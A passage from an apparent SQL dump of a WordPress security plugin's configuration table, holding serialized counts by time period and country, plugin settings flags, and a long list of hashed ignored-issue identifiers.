:4705914;}i:18;a:2:{s:1:\"t\";i:1566986400;s:1:\"c\";i:4535325;}i:19;a:2:{s:1:\"t\";i:1566990000;s:1:\"c\";i:4400930;}i:20;a:2:{s:1:\"t\";i:1566993600;s:1:\"c\";i:5521988;}i:21;a:2:{s:1:\"t\";i:1566997200;s:1:\"c\";i:5899389;}i:22;a:2:{s:1:\"t\";i:1567000800;s:1:\"c\";i:5600678;}i:23;a:2:{s:1:\"t\";i:1567004400;s:1:\"c\";i:5212114;}}s:2:\"7d\";a:7:{i:0;a:2:{s:1:\"t\";i:1566345600;s:1:\"c\";i:123144771;}i:1;a:2:{s:1:\"t\";i:1566432000;s:1:\"c\";i:106459138;}i:2;a:2:{s:1:\"t\";i:1566518400;s:1:\"c\";i:114274102;}i:3;a:2:{s:1:\"t\";i:1566604800;s:1:\"c\";i:118196568;}i:4;a:2:{s:1:\"t\";i:1566691200;s:1:\"c\";i:138517079;}i:5;a:2:{s:1:\"t\";i:1566777600;s:1:\"c\";i:119413891;}i:6;a:2:{s:1:\"t\";i:1566864000;s:1:\"c\";i:117605526;}}s:3:\"30d\";a:30:{i:0;a:2:{s:1:\"t\";i:1564358400;s:1:\"c\";i:198220607;}i:1;a:2:{s:1:\"t\";i:1564444800;s:1:\"c\";i:182598274;}i:2;a:2:{s:1:\"t\";i:1564531200;s:1:\"c\";i:205441717;}i:3;a:2:{s:1:\"t\";i:1564617600;s:1:\"c\";i:213002134;}i:4;a:2:{s:1:\"t\";i:1564704000;s:1:\"c\";i:220605794;}i:5;a:2:{s:1:\"t\";i:1564790400;s:1:\"c\";i:181457917;}i:6;a:2:{s:1:\"t\";i:1564876800;s:1:\"c\";i:170446121;}i:7;a:2:{s:1:\"t\";i:1564963200;s:1:\"c\";i:146646130;}i:8;a:2:{s:1:\"t\";i:1565049600;s:1:\"c\";i:125029502;}i:9;a:2:{s:1:\"t\";i:1565136000;s:1:\"c\";i:132999774;}i:10;a:2:{s:1:\"t\";i:1565222400;s:1:\"c\";i:108622837;}i:11;a:2:{s:1:\"t\";i:1565308800;s:1:\"c\";i:94970791;}i:12;a:2:{s:1:\"t\";i:1565395200;s:1:\"c\";i:98210125;}i:13;a:2:{s:1:\"t\";i:1565481600;s:1:\"c\";i:111367356;}i:14;a:2:{s:1:\"t\";i:1565568000;s:1:\"c\";i:113516900;}i:15;a:2:{s:1:\"t\";i:1565654400;s:1:\"c\";i:113106299;}i:16;a:2:{s:1:\"t\";i:1565740800;s:1:\"c\";i:103445024;}i:17;a:2:{s:1:\"t\";i:1565827200;s:1:\"c\";i:94783374;}i:18;a:2:{s:1:\"t\";i:1565913600;s:1:\"c\";i:110846363;}i:19;a:2:{s:1:\"t\";i:1566000000;s:1:\"c\";i:124462471;}i:20;a:2:{s:1:\"t\";i:1566086400;s:1:\"c\";i:124902615;}i:21;a:2:{s:1:\"t\";i:1566172800;s:1:\"c\";i:123738300;}i:22;a:2:{s:1:\"t\";i:1566259200;s:1:\"c\";i:125805152;}i:23;a:2:{s:1:\"t\";i:1566345600;s:1:\"c\";i:123144771;}i:24;a:2:{s:1:\"t\";i:1566432000;s:1:\"c\";i:106459138;}i:25;a:2:{s:1:\"t\";i:1566518400;s:1:\"c\";i:114274102;}i:26;a:2:{s:1:\"t\";i:1566604800;s:1:\"c\";i:118196568;}i:27;a:2:{s:1:\"t\";i:1566691200;s:1:\"c\";i:138517079;}i:28;a:2:{s:1:\"t\";i:1566777600;s:1:\"c\";i:119413891;}i:29;a:2:{s:1:\"t\";i:1566864000;s:1:\"c\";i:117605526;}}}s:9:\"countries\";a:1:{s:2:\"7d\";a:10:{i:0;a:2:{s:2:\"cd\";s:2:\"US\";s:2:\"ct\";i:242323607;}i:1;a:2:{s:2:\"cd\";s:2:\"CN\";s:2:\"ct\";i:196210673;}i:2;a:2:{s:2:\"cd\";s:2:\"RU\";s:2:\"ct\";i:81897773;}i:3;a:2:{s:2:\"cd\";s:2:\"UA\";s:2:\"ct\";i:81255835;}i:4;a:2:{s:2:\"cd\";s:2:\"FR\";s:2:\"ct\";i:71340313;}i:5;a:2:{s:2:\"cd\";s:2:\"IN\";s:2:\"ct\";i:70384918;}i:6;a:2:{s:2:\"cd\";s:2:\"TR\";s:2:\"ct\";i:50081154;}i:7;a:2:{s:2:\"cd\";s:2:\"DE\";s:2:\"ct\";i:48376717;}i:8;a:2:{s:2:\"cd\";s:2:\"VN\";s:2:\"ct\";i:46964045;}i:9;a:2:{s:2:\"cd\";s:2:\"SG\";s:2:\"ct\";i:44023635;}}}}','yes'),('dbTest','a:1:{s:5:\"nonce\";s:64:\"e7b92fbfe1e6544b9d65ec73a9a2d569fbb470e93c8c324d682c21ab033e6139\";}','no'),('dbVersion','10.2.25-MariaDB-log','yes'),('debugOn','0','yes'),('deleteTablesOnDeact','0','yes'),('detectProxyNextCheck','1567508351','no'),('detectProxyNonce','','no'),('detectProxyRecommendation','REMOTE_ADDR','no'),('diagnosticsWflogsRemovalHistory','[]','no'),('disableCodeExecutionUploads','0','yes'),('disableConfigCaching','0','yes'),('disableWAFIPBlocking','0','yes'),('disclosureStates','a:2:{s:22:\"global-options-general\";b:1;s:28:\"global-options-email-summary\";b:1;}','yes'),('dismissAutoPrependNotice','1','yes'),('displayAutomaticBlocks','1','yes'),('displayTopLevelBlocking','0','yes'),('displayTopLevelLiveTraffic','0','yes'),('displayTopLevelOptions','1','yes'),('emailedIssuesList','a:237:{i:0;a:2:{s:7:\"ignoreC\";s:32:\"da7f53b609bbf79e150a78fd7acf5d09\";s:7:\"ignoreP\";s:32:\"9e91bda556c787ece38e2e57cb1ef30d\";}i:1;a:2:{s:7:\"ignoreC\";s:32:\"7deaa06974a878f63167ca199a505bca\";s:7:\"ignoreP\";s:32:\"84e47f67469987869afb957f1921289b\";}i:2;a:2:{s:7:\"ignoreC\";s:32:\"8ed72b84b464f4512510e4a5101261f0\";s:7:\"ignoreP\";s:32:\"3cc92ff30a78c2d6abbd2663dacc6cb2\";}i:3;a:2:{s:7:\"ignoreC\";s:32:\"91e870adaa53da66cd2a6b18f3a98eda\";s:7:\"ignoreP\";s:32:\"53d3c9e72b4c8393aa897b5079bea431\";}i:4;a:2:{s:7:\"ignoreC\";s:32:\"03acbb2e2465a59058b37cdf9e44202f\";s:7:\"ignoreP\";s:32:\"ab614866865b5f5f895ca120c871e069\";}i:5;a:2:{s:7:\"ignoreC\";s:32:\"d5fd63b91997b4a91883355437f37f88\";s:7:\"ignoreP\";s:32:\"c39a5d6e70c50c50260fc645d046411f\";}i:6;a:2:{s:7:\"ignoreC\";s:32:\"e66027a906b32737b37fc47b2ba3b0de\";s:7:\"ignoreP\";s:32:\"5071c309c026426c11b97a4a41427351\";}i:7;a:2:{s:7:\"ignoreC\";s:32:\"ed896bc26218ccff4493cb90b70d987b\";s:7:\"ignoreP\";s:32:\"35c8878534ab406c1e2b6dbd7917d23d\";}i:8;a:2:{s:7:\"ignoreC\";s:32:\"ef51ae87b29b1c98d093532cfb143c87\";s:7:\"ignoreP\";s:32:\"4e32acb3651d97b5bdac35e591ccd4dc\";}i:9;a:2:{s:7:\"ignoreC\";s:32:\"92bb5ca8e9da14c420d83b055b5704fe\";s:7:\"ignoreP\";s:32:\"f2ecf0795019c98dc2100aa52aae6776\";}i:10;a:2:{s:7:\"ignoreC\";s:32:\"c5a51ab867ccca3050a8fe0eafcccdcd\";s:7:\"ignoreP\";s:32:\"0567dcc7babfbd817944d95c0b4d3ccc\";}i:11;a:2:{s:7:\"ignoreC\";s:32:\"0721fc6a3927f3d0e92aabf0ea70e8ce\";s:7:\"ignoreP\";s:32:\"daff6ea32f6b34f6e1aa1e00fe75f596\";}i:12;a:2:{s:7:\"ignoreC\";s:32:\"3dac10aab4dbf0e5ae811f8220d77bd2\";s:7:\"ignoreP\";s:32:\"6525291aa8b14ea5a714113080f12396\";}i:13;a:2:{s:7:\"ignoreC\";s:32:\"44bc2cfbcd6e37f4366de3e710d191b8\";s:7:\"ignoreP\";s:32:\"bdfaa0aa4a25b08d5539de55240eb7ec\";}i:14;a:2:{s:7:\"ignoreC\";s:32:\"f726f3e872a77481fce2ac159357e583\";s:7:\"ignoreP\";s:32:\"824c6e194297a5272994d8692e15350b\";}i:15;a:2:{s:7:\"ignoreC\";s:32:\"8977a541a8b3432cb2b007258afbe5f5\";s:7:\"ignoreP\";s:32:\"95406ae8aedd5a11d2f5002fa2f7ca31\";}i:16;a:2:{s:7:\"ignoreC\";s:32:\"a8e2fb5a6baa69dda25cc888b6c0f345\";s:7:\"ignoreP\";s:32:\"4e185ebd62b4ec6a4385b441fca2b40f\";}i:17;a:2:{s:7:\"ignoreC\";s:32:\"d60f0e02b693bf8775388658acc65bf6\";s:7:\"ignoreP\";s:32:\"53ca2e30462582b8c47bb2a8dcfaf40f\";}i:18;a:2:{s:7:\"ignoreC\";s:32:\"aabf96230ac92cbe2874d44304d93b8c\";s:7:\"ignoreP\";s:32:\"56eceb202de0e17c0eb222f5abbfa5e5\";}i:19;a:2:{s:7:\"ignoreC\";s:32:\"ed896bc26218ccff4493cb90b70d987b\";s:7:\"ignoreP\";s:32:\"3bc3732db12981a49eecb508856b576b\";}i:20;a:2:{s:7:\"ignoreC\";s:32:\"89744a4a9dd125505862d429d51569ed\";s:7:\"ignoreP\";s:32:\"529700bc3670b935c63bae27ef1d77c2\";}i:21;a:2:{s:7:\"ignoreC\";s:32:\"19237f1bec1f2b02547e24934d6312c2\";s:7:\"ignoreP\";s:32:\"157d196e5b0d3200b968268dd970daf1\";}i:22;a:2:{s:7:\"ignoreC\";s:32:\"494e401305d48efd8b1b81b67cabf79d\";s:7:\"ignoreP\";s:32:\"70f12bf78d89a34ca58148b645b84e8d\";}i:23;a:2:{s:7:\"ignoreC\";s:32:\"df37d10c58366bc6c4f821f1c098a3ef\";s:7:\"ignoreP\";s:32:\"3cdd4d600fe04d71222f2008690d1aa8\";}i:24;a:2:{s:7:\"ignoreC\";s:32:\"4bc371afaa7adba22bfa1c5d28d1d389\";s:7:\"ignoreP\";s:32:\"e70bf85c6c9336681799f1c89e186cd1\";}i:25;a:2:{s:7:\"ignoreC\";s:32:\"616b2c40cbfa4dea9d2aac1efaa488af\";s:7:\"ignoreP\";s:32:\"989c11c9415cc65718f2bdc4947fc303\";}i:26;a:2:{s:7:\"ignoreC\";s:32:\"f86140f1f5b051d6463d004b1918a7e5\";s:7:\"ignoreP\";s:32:\"f86140f1f5b051d6463d004b1918a7e5\";}i:27;a:2:{s:7:\"ignoreC\";s:32:\"4bf874fc13a29207f54a181573e1cd50\";s:7:\"ignoreP\";s:32:\"4bf874fc13a29207f54a181573e1cd50\";}i:28;a:2:{s:7:\"ignoreC\";s:32:\"61d641e1882dd36ec3e9d02a9ceebe74\";s:7:\"ignoreP\";s:32:\"61d641e1882dd36ec3e9d02a9ceebe74\";}i:29;a:2:{s:7:\"ignoreC\";s:32:\"13180580c9014485b59ba3113069a785\";s:7:\"ignoreP\";s:32:\"7a1802d181a3258cf17701ef765795ce\";}i:30;a:2:{s:7:\"ignoreC\";s:32:\"acb0876f703ba1044730aba1c58ac837\";s:7:\"ignoreP\";s:32:\"50a9a73267bb791ab0a8798806389d30\";}i:31;a:2:{s:7:\"ignoreC\";s:32:\"5c3c342f043cd0a7f022e73a0b5c9e4b\";s:7:\"ignoreP\";s:32:\"5c3c342f043cd0a7f022e73a0b5c9e4b\";}i:32;a:2:{s:7:\"ignoreC\";s:32:\"7c12e281d3e7b4f7ecfcb2b026146cb8\";s:7:\"ignoreP\";s:32:\"7c12e281d3e7b4f7ecfcb2b026146cb8\";}i:33;a:2:{s:7:\"ignoreC\";s:32:\"2f728bb132dd4fda96a2da8379197ffd\";s:7:\"ignoreP\";s:32:\"2f728bb132dd4fda96a2da8379197ffd\";}i:34;a:2:{s:7:\"ignoreC\";s:32:\"a0ef0423280ab08c3ae39999c7fc0fc9\";s:7:\"ignoreP\";s:32:\"e9af8bb29b0351eab484834ae5f393df\";}i:35;a:2:{s:7:\"ignoreC\";s:32:\"bc277f76867c0cb6e07796647958a9f7\";s:7:\"ignoreP\";s:32:\"8e2f77e51b627ccccfc8d857d632f8aa\";}i:36;a:2:{s:7:\"ignoreC\";s:32:\"877fc1191f31679effdaf4a8d3138bc7\";s:7:\"ignoreP\";s:32:\"6318d76d1a6eda2b453b32505b43eeda\";}i:37;a:2:{s:7:\"ignoreC\";s:32:\"1f5ef439f772fa3ac2f8044cf4e5ff48\";s:7:\"ignoreP\";s:32:\"763597e89313582eda754ddb7cd59199\";}i:38;a:2:{s:7:\"ignoreC\";s:32:\"fd6286483d2e58314f09bc583c41aeb4\";s:7:\"ignoreP\";s:32:\"604295b1debdaeb6db621e31700f4c0c\";}i:39;a:2:{s:7:\"ignoreC\";s:32:\"af9e99ee307be368e4f2374e53c09b35\";s:7:\"ignoreP\";s:32:\"9a3e9c541034087376947ea7d281e271\";}i:40;a:2:{s:7:\"ignoreC\";s:32:\"e33b7db500942f366e3c3a8289a64514\";s:7:\"ignoreP\";s:32:\"ee65590f73b9dcf2376a4454a862a130\";}i:41;a:2:{s:7:\"ignoreC\";s:32:\"25d9879f99614efcbab6fada6baa9c70\";s:7:\"ignoreP\";s:32:\"25d9879f99614efcbab6fada6baa9c70\";}i:42;a:2:{s:7:\"ignoreC\";s:32:\"8c8e03cee62486af7132534c8d2ea529\";s:7:\"ignoreP\";s:32:\"8c8e03cee62486af7132534c8d2ea529\";}i:43;a:2:{s:7:\"ignoreC\";s:32:\"9f5bb739b9a0c7c339ef7222e1bc39b7\";s:7:\"ignoreP\";s:32:\"9f5bb739b9a0c7c339ef7222e1bc39b7\";}i:44;a:2:{s:7:\"ignoreC\";s:32:\"f53487cecaa9c2d509ab56e2675252a7\";s:7:\"ignoreP\";s:32:\"f53487cecaa9c2d509ab56e2675252a7\";}i:45;a:2:{s:7:\"ignoreC\";s:32:\"c67c6e333f9c9b58d082be4e1be0d107\";s:7:\"ignoreP\";s:32:\"c67c6e333f9c9b58d082be4e1be0d107\";}i:46;a:2:{s:7:\"ignoreC\";s:32:\"0703f3e99bc2809b9306d0aabc41a00a\";s:7:\"ignoreP\";s:32:\"0703f3e99bc2809b9306d0aabc41a00a\";}i:47;a:2:{s:7:\"ignoreC\";s:32:\"a9bd5ea5f2ed602667b37289d4bc5797\";s:7:\"ignoreP\";s:32:\"a9bd5ea5f2ed602667b37289d4bc5797\";}i:48;a:2:{s:7:\"ignoreC\";s:32:\"8e089a1967dc6f7fa614f653cbd47942\";s:7:\"ignoreP\";s:32:\"8e089a1967dc6f7fa614f653cbd47942\";}i:49;a:2:{s:7:\"ignoreC\";s:32:\"d3dcac2e3054cb60f17bb31b49cce45c\";s:7:\"ignoreP\";s:32:\"d3dcac2e3054cb60f17bb31b49cce45c\";}i:50;a:2:{s:7:\"ignoreC\";s:32:\"416055f547ee0c60be3e2a913c95ca40\";s:7:\"ignoreP\";s:32:\"416055f547ee0c60be3e2a913c95ca40\";}i:51;a:2:{s:7:\"ignoreC\";s:32:\"ba08c92ee13f10b9bb7cc7479e149d6a\";s:7:\"ignoreP\";s:32:\"ba08c92ee13f10b9bb7cc7479e149d6a\";}i:52;a:2:{s:7:\"ignoreC\";s:32:\"43322549ab99c5a37585d523aa59c56e\";s:7:\"ignoreP\";s:32:\"f49707dc19a62387b7fd11b3a981a7a7\";}i:53;a:2:{s:7:\"ignoreC\";s:32:\"3a1d24b176cc5ff50fbda586c65255f1\";s:7:\"ignoreP\";s:32:\"3a1d24b176cc5ff50fbda586c65255f1\";}i:54;a:2:{s:7:\"ignoreC\";s:32:\"946f1aabfa9dee9c78c535acfe1bcfa7\";s:7:\"ignoreP\";s:32:\"946f1aabfa9dee9c78c535acfe1bcfa7\";}i:55;a:2:{s:7:\"ignoreC\";s:32:\"b90ec0427abf4b2c0a1f296ac2d641ee\";s:7:\"ignoreP\";s:32:\"69587cfe8929c3ac7839729db910951b\";}i:56;a:2:{s:7:\"ignoreC\";s:32:\"3c7e2fb97980ddbc5814dd6258642e37\";s:7:\"ignoreP\";s:32:\"004e071e21f0a3c918a10a925a7e8a61\";}i:57;a:2:{s:7:\"ignoreC\";s:32:\"3bedcfffcd2417748feb84e9400851c3\";s:7:\"ignoreP\";s:32:\"689e4af0ca46c9f4e0bedb460b995536\";}i:58;a:2:{s:7:\"ignoreC\";s:32:\"7a05852f91d6bbbb7c52a6ca788dc202\";s:7:\"ignoreP\";s:32:\"4b7e32d008bb05ef925fa8abfdbb104a\";}i:59;a:2:{s:7:\"ignoreC\";s:32:\"4da0157a630973c77d7306c7e501f7df\";s:7:\"ignoreP\";s:32:\"c0dd0e11e8cf85aa3e8d8ca9ee3703f4\";}i:60;a:2:{s:7:\"ignoreC\";s:32:\"f1b6d9921efdee7266e3f745fbc5b216\";s:7:\"ignoreP\";s:32:\"f57f3c6fc2581d6bece7126361a63424\";}i:61;a:2:{s:7:\"ignoreC\";s:32:\"0eaff7938e708e8a65f50f290e2b5c02\";s:7:\"ignoreP\";s:32:\"96c3cb510f86a44a11eba1c4c3354de6\";}i:62;a:2:{s:7:\"ignoreC\";s:32:\"17495b60b297d357b1a98d4d64c6afb0\";s:7:\"ignoreP\";s:32:\"caca7f0e79079e9aa53949632feddf99\";}i:63;a:2:{s:7:\"ignoreC\";s:32:\"d7f616bb0366c20609b5242da7b6eb86\";s:7:\"ignoreP\";s:32:\"d7f616bb0366c20609b5242da7b6eb86\";}i:64;a:2:{s:7:\"ignoreC\";s:32:\"5ada7be53ac8ccc9653f641b06088436\";s:7:\"ignoreP\";s:32:\"5ada7be53ac8ccc9653f641b06088436\";}i:65;a:2:{s:7:\"ignoreC\";s:32:\"f6620aa1c75d8246339bd68472b14b12\";s:7:\"ignoreP\";s:32:\"f6620aa1c75d8246339bd68472b14b12\";}i:66;a:2:{s:7:\"ignoreC\";s:32:\"ab5e52d3b8edb449be6476eb568e1956\";s:7:\"ignoreP\";s:32:\"ab5e52d3b8edb449be6476eb568e1956\";}i:67;a:2:{s:7:\"ignoreC\";s:32:\"0c340bf9d4f999bd1b2aa4b97b5e286b\";s:7:\"ignoreP\";s:32:\"f02a7acf73de284e5633e99b292bf60b\";}i:68;a:2:{s:7:\"ignoreC\";s:32:\"825bceca24b6faaad0d850196097c4df\";s:7:\"ignoreP\";s:32:\"3aec5a5ed4a7ba5ab58fe18710668dbb\";}i:69;a:2:{s:7:\"ignoreC\";s:32:\"9262186ec9ee1ee753093140867bae64\";s:7:\"ignoreP\";s:32:\"9262186ec9ee1ee753093140867bae64\";}i:70;a:2:{s:7:\"ignoreC\";s:32:\"8e0281476cca8a54eacf83a75ac6a431\";s:7:\"ignoreP\";s:32:\"78650c7cbcb99d87a50f0c16e07c58ff\";}i:71;a:2:{s:7:\"ignoreC\";s:32:\"e096e87a52c14c6fe02734c786cd03cd\";s:7:\"ignoreP\";s:32:\"801e8e99a817da3d6e73efe5021a86ad\";}i:72;a:2:{s:7:\"ignoreC\";s:32:\"bc00c5b3bb813f1ff9f743601b67a6e3\";s:7:\"ignoreP\";s:32:\"22efb07114ae97066037afb4c2f2f7a6\";}i:73;a:2:{s:7:\"ignoreC\";s:32:\"d2e113a0fd804d1878db30542f269fe1\";s:7:\"ignoreP\";s:32:\"c41d50052e62ffd0cd1c01cf4f7233b2\";}i:74;a:2:{s:7:\"ignoreC\";s:32:\"1d3b89b42238a65c02cb92586c764387\";s:7:\"ignoreP\";s:32:\"e887ab7a1acd0a9c76e4908ed68ec016\";}i:75;a:2:{s:7:\"ignoreC\";s:32:\"2395cc9f43ee4961b4008886160e4af9\";s:7:\"ignoreP\";s:32:\"2395cc9f43ee4961b4008886160e4af9\";}i:76;a:2:{s:7:\"ignoreC\";s:32:\"322eea2f5c04e9ae50bad81626ecf111\";s:7:\"ignoreP\";s:32:\"9fef5ec4e24d609b9058d3725db3b1d5\";}i:77;a:2:{s:7:\"ignoreC\";s:32:\"251d3af96cb685a5957341c039a75ab0\";s:7:\"ignoreP\";s:32:\"46d4ec8f91ea4c130bafd0393b5eac26\";}i:78;a:2:{s:7:\"ignoreC\";s:32:\"da8ac50b0f5d03ea94018c68a11ae66f\";s:7:\"ignoreP\";s:32:\"da8ac50b0f5d03ea94018c68a11ae66f\";}i:79;a:2:{s:7:\"ignoreC\";s:32:\"ffbd90c29c55e636c4726e84cdf42acc\";s:7:\"ignoreP\";s:32:\"2c22d3f128dd33e57df8dd37b9bf0f2b\";}i:80;a:2:{s:7:\"ignoreC\";s:32:\"b4efdc145d23b0cbbfcea25656cdcd9d\";s:7:\"ignoreP\";s:32:\"b4efdc145d23b0cbbfcea25656cdcd9d\";}i:81;a:2:{s:7:\"ignoreC\";s:32:\"4da0544a9daabcd80656d62e531d1572\";s:7:\"ignoreP\";s:32:\"4da0544a9daabcd80656d62e531d1572\";}i:82;a:2:{s:7:\"ignoreC\";s:32:\"4f29636b7ea6ad4978331fc5fabf4ba5\";s:7:\"ignoreP\";s:32:\"4f29636b7ea6ad4978331fc5fabf4ba5\";}i:83;a:2:{s:7:\"ignoreC\";s:32:\"28e0a8a2a589f98d43612ea34aa0e480\";s:7:\"ignoreP\";s:32:\"28e0a8a2a589f98d43612ea34aa0e480\";}i:84;a:2:{s:7:\"ignoreC\";s:32:\"745c115d5df1493160d76c91327b412f\";s:7:\"ignoreP\";s:32:\"a4ba20369d7a1bcce5493a93069f6f18\";}i:85;a:2:{s:7:\"ignoreC\";s:32:\"b2c536e3f97f52fabbbedcafe38ae402\";s:7:\"ignoreP\";s:32:\"3522fc7e7ae8783874d1cda39abdc69e\";}i:86;a:2:{s:7:\"ignoreC\";s:32:\"ba29080de4235773e1103d30e4c88169\";s:7:\"ignoreP\";s:32:\"472ce588c5e341c5af1969e55f6bfdcd\";}i:87;a:2:{s:7:\"ignoreC\";s:32:\"a7de7a963b4e73833ecc72c8f98560b7\";s:7:\"ignoreP\";s:32:\"cbe4f99d8d7172b988c232021deda239\";}i:88;a:2:{s:7:\"ignoreC\";s:32:\"3eb060d4f953d29373100b1ba9d13398\";s:7:\"ignoreP\";s:32:\"e21f322a7301a25d37a67a560c7dda05\";}i:89;a:2:{s:7:\"ignoreC\";s:32:\"e9322a08d3b5dc2c66eaa1c931d5089c\";s:7:\"ignoreP\";s:32:\"c74c22efdfd23a03b7efccbfa7806f08\";}i:90;a:2:{s:7:\"ignoreC\";s:32:\"483cc620c3ffc27f13674b0308b76b7b\";s:7:\"ignoreP\";s:32:\"e29cdd77dcc34da7b98b98e01f745b31\";}i:91;a:2:{s:7:\"ignoreC\";s:32:\"9e5015604cb1468ad1af58400cc81cf7\";s:7:\"ignoreP\";s:32:\"dfee1b711966e67701f0719e9136a7de\";}i:92;a:2:{s:7:\"ignoreC\";s:32:\"f4fdbeaf04f80f912e68f7ed8ca19bbf\";s:7:\"ignoreP\";s:32:\"f4fdbeaf04f80f912e68f7ed8ca19bbf\";}i:93;a:2:{s:7:\"ignoreC\";s:32:\"bd3796e10d6b9ba233821f02b56d20c3\";s:7:\"ignoreP\";s:32:\"bd3796e10d6b9ba233821f02b56d20c3\";}i:94;a:2:{s:7:\"ignoreC\";s:32:\"659b0296f53a2a339036134398c45f86\";s:7:\"ignoreP\";s:32:\"659b0296f53a2a339036134398c45f86\";}i:95;a:2:{s:7:\"ignoreC\";s:32:\"f98e7dcd6f1b6a7542413b2bcc3a0bbf\";s:7:\"ignoreP\";s:32:\"54b112ee04ad6dbf52e24145b1ab54bf\";}i:96;a:2:{s:7:\"ignoreC\";s:32:\"42eef63592be0780fb0bc1b641a59bc4\";s:7:\"ignoreP\";s:32:\"42eef63592be0780fb0bc1b641a59bc4\";}i:97;a:2:{s:7:\"ignoreC\";s:32:\"465e5088025086ca305d3fc782a72f55\";s:7:\"ignoreP\";s:32:\"465e5088025086ca305d3fc782a72f55\";}i:98;a:2:{s:7:\"ignoreC\";s:32:\"726fcd0d40c97bfde157762dcee1a8f9\";s:7:\"ignoreP\";s:32:\"726fcd0d40c97bfde157762dcee1a8f9\";}i:99;a:2:{s:7:\"ignoreC\";s:32:\"189a70f235e5a141d115d1666df4ba96\";s:7:\"ignoreP\";s:32:\"ff02f1b8784213fb6debaed44b3d4ba3\";}i:100;a:2:{s:7:\"ignoreC\";s:32:\"0da338894d7a359073ea44371aa7289c\";s:7:\"ignoreP\";s:32:\"0da338894d7a359073ea44371aa7289c\";}i:101;a:2:{s:7:\"ignoreC\";s:32:\"6dadc29a8339bdac7ea32e9b30380c72\";s:7:\"ignoreP\";s:32:\"6dadc29a8339bdac7ea32e9b30380c72\";}i:102;a:2:{s:7:\"ignoreC\";s:32:\"fa8ba494bc158390f6f757d8412e9776\";s:7:\"ignoreP\";s:32:\"fa8ba494bc158390f6f757d8412e9776\";}i:103;a:2:{s:7:\"ignoreC\";s:32:\"635d3d576422d549dd2c3ef6155e55dc\";s:7:\"ignoreP\";s:32:\"41c30dbb37c6234ee0872e72ccb7e282\";}i:104;a:2:{s:7:\"ignoreC\";s:32:\"ebec9c0f13b06f4c667b68cf3c401a4e\";s:7:\"ignoreP\";s:32:\"127f7c1d11d88f59682a78fb9999568b\";}i:105;a:2:{s:7:\"ignoreC\";s:32:\"5c17e5e264c72babdfdd376d25145823\";s:7:\"ignoreP\";s:32:\"03b59c0de85a2b54cc9382b78f35550b\";}i:106;a:2:{s:7:\"ignoreC\";s:32:\"6bdd0c32e84b3c9107e418d5fef944ec\";s:7:\"ignoreP\";s:32:\"3e04eae4ad5b3951366732382ebedca8\";}i:107;a:2:{s:7:\"ignoreC\";s:32:\"8272da3cc69377fd585de03fa775dfa3\";s:7:\"ignoreP\";s:32:\"94438529c3e2ab061a446c522bcba9b4\";}i:108;a:2:{s:7:\"ignoreC\";s:32:\"f9d7772d1f442d24e8edffa0c73ba193\";s:7:\"ignoreP\";s:32:\"623a4431f0347c413a6c3972c987abb0\";}i:109;a:2:{s:7:\"ignoreC\";s:32:\"d577e62fc61d768d208215df1ba665a0\";s:7:\"ignoreP\";s:32:\"a491ba4d0e951ca99b81ff2cd770b06e\";}i:110;a:2:{s:7:\"ignoreC\";s:32:\"ef8085f0fd703ecad2b7b6ea5bcabd99\";s:7:\"ignoreP\";s:32:\"6f54bf39d634f52831e40096622f6dbf\";}i:111;a:2:{s:7:\"ignoreC\";s:32:\"59a6584cfde5f8c27be7c0273afa7e49\";s:7:\"ignoreP\";s:32:\"8226cfb826527e4a6052eaf4a6107edb\";}i:112;a:2:{s:7:\"ignoreC\";s:32:\"03ee7e5a17292f060c59bcbb212ac7f8\";s:7:\"ignoreP\";s:32:\"03ee7e5a17292f060c59bcbb212ac7f8\";}i:113;a:2:{s:7:\"ignoreC\";s:32:\"62bb154399deee3a33a54b1eb4c4a164\";s:7:\"ignoreP\";s:32:\"a4c2709395381d65bc89b8dbe8a8450b\";}i:114;a:2:{s:7:\"ignoreC\";s:32:\"138ace3ab303acbfd049bb4dce5c0c77\";s:7:\"ignoreP\";s:32:\"f580d22a1bde9b4728f8503e54c0593c\";}i:115;a:2:{s:7:\"ignoreC\";s:32:\"c9a325926e89477a86eb838187cc1726\";s:7:\"ignoreP\";s:32:\"fde98f69e9208c60b810ba725fb0851b\";}i:116;a:2:{s:7:\"ignoreC\";s:32:\"8cd6cf4e2083892e4c5f3ab6969f026e\";s:7:\"ignoreP\";s:32:\"e96a1f3bb75132e409abf51a7b48530b\";}i:117;a:2:{s:7:\"ignoreC\";s:32:\"7f59824a14992ce47a71f6f25d463de4\";s:7:\"ignoreP\";s:32:\"32175b0f03f508eb95915e7e13ae7bf5\";}i:118;a:2:{s:7:\"ignoreC\";s:32:\"8f1213eec5c7a155b26c61a7cdb0673e\";s:7:\"ignoreP\";s:32:\"a5b07f9242d5df33d3f1275ad85b2f0a\";}i:119;a:2:{s:7:\"ignoreC\";s:32:\"f36b3eda78efd9bbe9a9691cb53e4987\";s:7:\"ignoreP\";s:32:\"ba736ae2bd1a627081218a20b2530862\";}i:120;a:2:{s:7:\"ignoreC\";s:32:\"fb2f502d9c349fd2c88b5047f419b175\";s:7:\"ignoreP\";s:32:\"0fd9c5561be747f78ad5b631b45335db\";}i:121;a:2:{s:7:\"ignoreC\";s:32:\"e52039125e4c658877de25112fa4248f\";s:7:\"ignoreP\";s:32:\"6fa5820afdc3f838dd089b2b2d3f0617\";}i:122;a:2:{s:7:\"ignoreC\";s:32:\"e7b40a0f5b4adfa63c9a5614f32ce6a9\";s:7:\"ignoreP\";s:32:\"4f650cd3a9cf12045f994f477651aec5\";}i:123;a:2:{s:7:\"ignoreC\";s:32:\"af890f9f6a3400c6987cc030e57c74b6\";s:7:\"ignoreP\";s:32:\"af890f9f6a3400c6987cc030e57c74b6\";}i:124;a:2:{s:7:\"ignoreC\";s:32:\"f49cd1075a6858b09603b71b344f97b0\";s:7:\"ignoreP\";s:32:\"a3163e71219e2b753b4b34620457bd56\";}i:125;a:2:{s:7:\"ignoreC\";s:32:\"659ba23880d863d4ff2a50160b057a4d\";s:7:\"ignoreP\";s:32:\"659ba23880d863d4ff2a50160b057a4d\";}i:126;a:2:{s:7:\"ignoreC\";s:32:\"5a20643a14cf22971cb8b61f56bb2b56\";s:7:\"ignoreP\";s:32:\"5a20643a14cf22971cb8b61f56bb2b56\";}i:127;a:2:{s:7:\"ignoreC\";s:32:\"0ce92c58a32eeb5961bc8eaf769e5a5b\";s:7:\"ignoreP\";s:32:\"0ce92c58a32eeb5961bc8eaf769e5a5b\";}i:128;a:2:{s:7:\"ignoreC\";s:32:\"d1dc8a0121b1293b1ac0f5cb27e78884\";s:7:\"ignoreP\";s:32:\"d1dc8a0121b1293b1ac0f5cb27e78884\";}i:129;a:2:{s:7:\"ignoreC\";s:32:\"c35f2172a7f6a934e7